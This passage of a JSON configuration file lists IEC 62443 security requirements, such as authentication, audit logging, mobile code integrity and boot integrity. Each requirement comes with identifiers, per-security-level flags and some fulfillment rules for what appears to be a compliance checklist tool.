authentication","Description":"","subReqTypeIDs":["41bd377e-a304-44ae-aabc-807d51f3772d","9b275641-37b2-4da1-a70a-1cc365085a99"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":true}}}},{"ID":"41bd377e-a304-44ae-aabc-807d51f3772d","Name":"RE-1 Password generation and lifetime restrictions for human users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"","ComparisonType":"==","Value":true}}}},{"ID":"9b275641-37b2-4da1-a70a-1cc365085a99","Name":"RE-2 Password lifetime restrictions for all users (human, software, process or device)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"72982bda-38dc-4904-8080-4e7a37df743d","Name":"CR-1-8 Public key infrastructure certificates","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"ccb81ee9-073d-4deb-aed5-7972b2d212a3","Name":"CR-1-9 Strength of public key-based authentication","Description":"","subReqTypeIDs":["cfd6bbed-bff7-44e9-866a-ea3a217cb32c"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"cfd6bbed-bff7-44e9-866a-ea3a217cb32c","Name":"RE-1 Hardware security for public key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","Name":"CR-1-10 Authenticator feedback","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"370cc79b-a473-4247-b171-4ad0233a0a34","Name":"CR-1-11 Unsuccessful login attempts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":true}}}},{"ID":"a8e6d55e-3440-46b1-8624-bcb1bd8364cc","Name":"CR-1-12 System use notifications","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c5230fd4-d5f9-4229-8f71-170617397b3a","Name":"NDR-1-13 Access via untrusted networks","Description":"","subReqTypeIDs":["3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2","Name":"RE-1 Explicit access request approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"65a904e7-9c92-4932-946e-042b19d5c7c9","Name":"NDR-1-14 Strength of symmetric key-based authentication","Description":"","subReqTypeIDs":["1177ff8e-e4b0-49cf-b59f-f01ed37401e6"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1177ff8e-e4b0-49cf-b59f-f01ed37401e6","Name":"RE-1 Hardware security for symmetric key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"dda8e95b-17ba-465f-a789-430d5a378ee1","Name":"CR-2-1 Authorization enforcement","Description":"","subReqTypeIDs":["8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","2872406c-cd16-433f-af5d-23401f08c6eb","39f2063b-c426-4504-a00e-4d77a69aba7e","646f8c75-c631-4b2e-af11-4d069816cefe"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","Name":"RE-1 Authorization enforcement for all users (human, software, processes, devices)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2872406c-cd16-433f-af5d-23401f08c6eb","Name":"RE-2 Permission mapping of roles","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"39f2063b-c426-4504-a00e-4d77a69aba7e","Name":"RE-3 Supervisor override","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"646f8c75-c631-4b2e-af11-4d069816cefe","Name":"RE-4 Dual approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"ff84fa60-5084-438a-9536-7f2fb011c9b3","Name":"CR-2-2 Wireless use control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8cfe7593-93b6-4b0c-a715-caddbc7d18cb","Name":"CR-2-3 Use control for portable and mobile devices","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"532c1932-789e-4fbb-8167-6d63eb789c92","Name":"SAR-2-4 Mobile code","Description":"","subReqTypeIDs":["eb2fbe1f-2d10-40cf-ba68-c72e03b3154b"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"eb2fbe1f-2d10-40cf-ba68-c72e03b3154b","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"401ef547-ea2c-4398-8015-66490cb02976","Name":"EDR-2-4 Mobile code ","Description":"","subReqTypeIDs":["b8252e5d-de07-4b58-bab7-0869f9bed5a2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b8252e5d-de07-4b58-bab7-0869f9bed5a2","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"37d9f118-5bb7-4691-976b-2c949172dce3","Name":"HDR-2-4 Mobile code","Description":"","subReqTypeIDs":["6bafc0b1-efbf-4eb9-a83d-c4e8714420bc"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6bafc0b1-efbf-4eb9-a83d-c4e8714420bc","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"5740c4a1-403c-482a-a235-fff4444fb92e","Name":"NDR-2-4 Mobile code","Description":"","subReqTypeIDs":["8db6ce88-f19f-4f3d-8d8e-6dfefff6123c"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8db6ce88-f19f-4f3d-8d8e-6dfefff6123c","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","Name":"CR-2-5 Session lock","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3e691ca4-eb77-4be1-902e-04c75aefcd00","Name":"CR-2-6 Remote session termination","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3af81552-bb3f-4125-99d2-6127fa74c428","Name":"CR-2-7 Concurrent session control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"779d3751-b9bd-4e97-80db-70a0631181ad","Name":"CR-2-8 Auditable events","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"ed08bb4b-7e98-47b1-bf97-cbce20a304cd","Name":"CR-2-9 Audit storage capacity","Description":"","subReqTypeIDs":["c504eafc-876f-47a4-8a60-cb0f7816747e"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c504eafc-876f-47a4-8a60-cb0f7816747e","Name":"RE-1 Warn when audit record storage capacity threshold reached","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":true}}}},{"ID":"5c662093-fd9f-4861-ae05-41f91e6a3514","Name":"CR-2-10 Response to audit processing failures","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0317d147-90d9-4879-bf07-6e167c0dc533","Name":"CR-2-11 Timestamps","Description":"","subReqTypeIDs":["9c3f74c1-f63b-4b83-843d-c67a63c634a5","6137a0c0-5939-4857-a44c-c117a3d99531"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c3f74c1-f63b-4b83-843d-c67a63c634a5","Name":"RE-1 Time synchronization","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6137a0c0-5939-4857-a44c-c117a3d99531","Name":"RE-2 Protection of time source integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,false,true],"ReqFulfillRule":{}},{"ID":"3d164cce-adde-41cd-9470-c0e60ff22559","Name":"CR-2-12 Non-repudiation","Description":"","subReqTypeIDs":["5fea8725-6bae-4cf8-9a3a-ec4669bec7a1"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"5fea8725-6bae-4cf8-9a3a-ec4669bec7a1","Name":"RE-1 Non-repudiation for all users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"77a29d2d-372e-4c12-b538-81f95afd6e0b","Name":"EDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1243b38d-ea80-424c-946c-c8f9aef190fd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1243b38d-ea80-424c-946c-c8f9aef190fd","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"956c289a-0cd4-4e8c-831a-b327c8dbbde5","Name":"HDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["735882c4-439f-4cca-a97f-0e535519fe2f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"735882c4-439f-4cca-a97f-0e535519fe2f","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","Name":"NDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1a69695b-d04e-409d-9256-4be696ea78df"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1a69695b-d04e-409d-9256-4be696ea78df","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"79bd4891-d677-4c06-91d6-3bc414e59193","Name":"CR-3-1 Communication integrity","Description":"","subReqTypeIDs":["79b5872c-1d0e-498f-8fe7-c97f1163a4b3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"79b5872c-1d0e-498f-8fe7-c97f1163a4b3","Name":"RE-1 Communication authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"c5b4aa95-a00a-42b3-96ca-31d98557a19c","Name":"SAR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b26d4748-2b7c-4821-b11a-f51fd7e85307","Name":"EDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a51e9e7-b87f-4d62-85df-288320d456f1","Name":"HDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":["888d4fc0-a127-4890-9de2-46a3235ff069"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"888d4fc0-a127-4890-9de2-46a3235ff069","Name":"RE-1 Report version of code protection","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"13a182cc-6caa-4193-8fd2-4b497e0a16ed","Name":"NDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c8a4b08-ce26-467d-8d7d-bf9db81f8944","Name":"CR-3-3 Security functionality verification","Description":"","subReqTypeIDs":["a6729f24-7a95-432b-a61c-98c2621246e0"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"a6729f24-7a95-432b-a61c-98c2621246e0","Name":"RE-1 Security functionality verification during normal operation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"63a333db-4074-4ebc-9fa5-63a248e9e3e1","Name":"CR-3-4 Software and information integrity","Description":"","subReqTypeIDs":["73159393-9139-4f82-9980-a28e2285c936","d62835c2-73c9-4fdd-a01c-a92a613ba773"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"73159393-9139-4f82-9980-a28e2285c936","Name":"RE-1 Authenticity of software and information","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d62835c2-73c9-4fdd-a01c-a92a613ba773","Name":"RE-2 Automated notification of integrity violations","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"b6dcb790-3ce2-4635-839e-3b2032499ffa","Name":"CR-3-5 Input validation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0d163821-ac6f-4969-81d6-821afc8f181e","Name":"CR-3-6 Deterministic output","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","Name":"CR-3-7 Error handling","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","Name":"CR-3-8 Session integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f74ea015-618a-4553-86b8-c2917ff637ae","Name":"CR-3-9 Protection of audit information","Description":"","subReqTypeIDs":["df820586-0d90-4d3a-848b-31695c26f589"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"df820586-0d90-4d3a-848b-31695c26f589","Name":"RE-1 Audit records on write-once media","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"41defa29-c849-4680-847b-9f40fabc7286","Name":"EDR-3-10 Support for updates","Description":"","subReqTypeIDs":["f38c5728-f34c-412e-92da-323f7b4e9a81"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ac95cfac-e4b9-4639-a066-3bf7df6c7c73","Name":"HDR-3-10 Support for updates","Description":"","subReqTypeIDs":["16784a5f-9b1c-49b8-aafb-38efb2d353d3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1a731a13-8b40-4b33-aa7f-286a3bc2882a","Name":"NDR-3-10 Support for updates","Description":"","subReqTypeIDs":["4e1187a2-cc24-44be-9224-f623a08d9c4d"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f38c5728-f34c-412e-92da-323f7b4e9a81","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"16784a5f-9b1c-49b8-aafb-38efb2d353d3","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"4e1187a2-cc24-44be-9224-f623a08d9c4d","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e62acf0c-4013-468c-9bb7-7940d0270e69","Name":"EDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["af74cb52-979d-4d87-8f90-c5e7bd89bd24"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"af74cb52-979d-4d87-8f90-c5e7bd89bd24","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"57d7ca9b-b06e-4273-800f-8caa19dfb1e7","Name":"HDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["715c78fa-1a00-48be-8041-00d51fbaaea3"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"715c78fa-1a00-48be-8041-00d51fbaaea3","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","Name":"NDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["db0f3812-37c4-4a42-994d-eed41733aecd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db0f3812-37c4-4a42-994d-eed41733aecd","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","Name":"EDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d6b5b544-3184-43ba-bc05-ae90bf503067","Name":"HDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"15b54837-a7f6-4e95-8773-9b999abfa998","Name":"NDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2e279fd1-f688-4c9a-aee2-abff49d6b1ab","Name":"EDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db2383ba-3aba-408b-8317-6c10af37d1ea","Name":"HDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d30db9ad-4a71-4e14-bc8f-718834d56e03","Name":"NDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d8332abf-0ac2-4096-bde8-02f5716ba15e","Name":"EDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["ea71647c-8da7-47d1-afbb-74c1f2a650c3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b4c58d1f-016b-4244-baf3-e2ee57eff599","Name":"HDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["05e9457f-fbee-4d97-9544-602355a9cfcf"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","Name":"NDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["f5f5cd83-4363-4d82-bae8-1d544d819817"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ea71647c-8da7-47d1-afbb-74c1f2a650c3","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"05e9457f-fbee-4d97-9544-602355a9cfcf","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f5f5cd83-4363-4d82-bae8-1d544d819817","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"926c6b5b-0a1f-4833-a612-97691a10d83f","Name":"CR-4-1 Information confidentiality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6cefc8a9-b69b-4197-961c-dbbc27cbd23b","Name":"CR-4-2 Information persistence","Description":"","subReqTypeIDs":["f7aecf4a-2116-4ae0-91b1-3662d934c780","a89a4958-6563-4000-94c0-89c8f6e8957c"],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"4854fee5-99e3-4c4b-8b53-4c37629005d0","Name":"CR-4-3 Use of cryptography","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f7aecf4a-2116-4ae0-91b1-3662d934c780","Name":"RE-1 Erase of shared memory resources","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"a89a4958-6563-4000-94c0-89c8f6e8957c","Name":"RE-2 Erase verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"8ed9c57b-fbe4-435a-8036-501cf5a95f3e","Name":"CR-5-1 Network segmentation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"98d81760-6978-4372-809a-8303352c53b7","Name":"NDR-5-2 Zone boundary protection","Description":"","subReqTypeIDs":["1baf9958-8f82-471a-878f-b1fffa8635d5","e63f8128-7889-4913-8e11-9d47ec988ddf","77ae236f-11a6-4736-bb48-57c54ab5db07"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1baf9958-8f82-471a-878f-b1fffa8635d5","Name":"RE-1 Deny all, permit by exeption","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e63f8128-7889-4913-8e11-9d47ec988ddf","Name":"RE-2 Island mode","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"77ae236f-11a6-4736-bb48-57c54ab5db07","Name":"RE-3 Fail close","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"b06635ce-dc29-44de-a719-81829a3962de","Name":"NDR-5-3 General purpose, person-to-person communication restrictions","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"72adfa45-cc4e-4539-ad87-99d1f46f4eab","Name":"CR-6-1 Audit log accessibility","Description":"","subReqTypeIDs":["1b81685b-6009-4433-b015-8a27125c2d21"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1b81685b-6009-4433-b015-8a27125c2d21","Name":"RE-1 Programmatic access to audit logs","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"798e83ee-b5ad-46c2-8bd5-58c968e8390a","Name":"CR-6-2 Continuous monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"64064d6d-e701-4ebf-ab84-3f702b32b8ff","Name":"CR-7-1 Denial of service protection","Description":"","subReqTypeIDs":["1c033715-b1c1-45f1-a39d-0aeda88a1682"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"d07a5fcc-e3fa-4525-8253-e5463c56a905","Name":"CR-7-2 Resource management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1c033715-b1c1-45f1-a39d-0aeda88a1682","Name":"RE-1 Manage communication load from component","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1936692f-af1c-4335-b9c4-60ff1da57ae1","Name":"CR-7-3 Control system backup","Description":"","subReqTypeIDs":["1e5aec13-f2b6-4039-9f67-fa343e2c8098"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0c455f28-1b52-4d02-b358-fc13ae9c2e85","Name":"CR-7-4 Control system recovery and reconstruction","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1e5aec13-f2b6-4039-9f67-fa343e2c8098","Name":"RE-1 Backup integrity verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2b6d967f-e572-4e6a-a5dd-11cdce427df4","Name":"CR-7-5 Emergency-power supply","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,false,false,false],"ReqFulfillRule":{}},{"ID":"1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","Name":"CR-7-6 Network and security configuration settings","Description":"","subReqTypeIDs":["ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"08cf1ab2-c34b-473e-a332-4e99c616db7d","Name":"CR-7-7 Least functionality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8d84eb63-48d8-41e8-aeb1-ef767a5fb572","Name":"CR-7-8 Control system component inventory","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f","Name":"RE-1 Machine-readable reporting of current security settings","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}}],"checklistTypes":[{"ID":"afc63fe6-27cc-4ab5-b44e-adcb29ecab49","Name":"IEC-62443","Description":"CR: Component requirement, SAR: Software application requirement, EDR: Embedded device requirement, HDR: Host device requirement, NDR: Network device requirement","requirementTypeIDs":["b008aede-3518-44f3-8cc2-7e92b68e0329","d47f441d-e3bf-461d-b724-47a90c19bc89","83a019dd-d28b-4f3d-bf48-e254d2031445","b7bcf087-c925-4eec-9a11-e042250afbf1","f28381c7-5c24-4fd3-b75e-03fbebe03857","bd31bc1e-43ed-48f2-80ae-885680bcd378","40670f38-5fd9-47a3-994b-41a271a71694","72982bda-38dc-4904-8080-4e7a37df743d","ccb81ee9-073d-4deb-aed5-7972b2d212a3","da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","370cc79b-a473-4247-b171-4ad0233a0a34","a8e6d55e-3440-46b1-8624-bcb1bd8364cc","c5230fd4-d5f9-4229-8f71-170617397b3a","65a904e7-9c92-4932-946e-042b19d5c7c9","dda8e95b-17ba-465f-a789-430d5a378ee1","ff84fa60-5084-438a-9536-7f2fb011c9b3","8cfe7593-93b6-4b0c-a715-caddbc7d18cb","532c1932-789e-4fbb-8167-6d63eb789c92","401ef547-ea2c-4398-8015-66490cb02976","37d9f118-5bb7-4691-976b-2c949172dce3","5740c4a1-403c-482a-a235-fff4444fb92e","6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","3e691ca4-eb77-4be1-902e-04c75aefcd00","3af81552-bb3f-4125-99d2-6127fa74c428","779d3751-b9bd-4e97-80db-70a0631181ad","ed08bb4b-7e98-47b1-bf97-cbce20a304cd","5c662093-fd9f-4861-ae05-41f91e6a3514","0317d147-90d9-4879-bf07-6e167c0dc533","3d164cce-adde-41cd-9470-c0e60ff22559","77a29d2d-372e-4c12-b538-81f95afd6e0b","956c289a-0cd4-4e8c-831a-b327c8dbbde5","2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","79bd4891-d677-4c06-91d6-3bc414e59193","c5b4aa95-a00a-42b3-96ca-31d98557a19c","b26d4748-2b7c-4821-b11a-f51fd7e85307","8a51e9e7-b87f-4d62-85df-288320d456f1","13a182cc-6caa-4193-8fd2-4b497e0a16ed","9c8a4b08-ce26-467d-8d7d-bf9db81f8944","63a333db-4074-4ebc-9fa5-63a248e9e3e1","b6dcb790-3ce2-4635-839e-3b2032499ffa","0d163821-ac6f-4969-81d6-821afc8f181e","1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","f74ea015-618a-4553-86b8-c2917ff637ae","41defa29-c849-4680-847b-9f40fabc7286","ac95cfac-e4b9-4639-a066-3bf7df6c7c73","1a731a13-8b40-4b33-aa7f-286a3bc2882a","e62acf0c-4013-468c-9bb7-7940d0270e69","57d7ca9b-b06e-4273-800f-8caa19dfb1e7","4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","d6b5b544-3184-43ba-bc05-ae90bf503067","15b54837-a7f6-4e95-8773-9b999abfa998","2e279fd1-f688-4c9a-aee2-abff49d6